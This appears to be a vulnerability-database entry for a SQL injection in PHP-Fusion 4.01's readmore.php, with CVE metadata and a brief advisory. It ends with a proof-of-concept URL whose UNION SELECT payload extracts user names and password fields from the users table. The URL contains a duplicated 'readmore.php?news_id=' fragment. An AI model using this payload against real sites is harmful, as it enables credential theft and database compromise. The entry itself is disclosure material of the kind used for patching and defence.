[] NeoSense

PHP-Fusion 4.01 - 'readmore.php' SQL Injection

Author: Rake
type: webapps
platform: php
port: 
date_added: 2008-08-13 
date_updated: 2014-03-14 
verified: 1 
codes: CVE-2008-5946;OSVDB-51509 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/30680/info

PHP-Fusion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

PHP-Fusion 4.01 is vulnerable; other versions may also be affected.

http://www.example.com/readmore.php?news_id=readmore.php?news_id=-1%20'UNION%20SELECT%201,user_name,3,user_password,5,6,7,8,9,10,11%20from%20fusion_users/*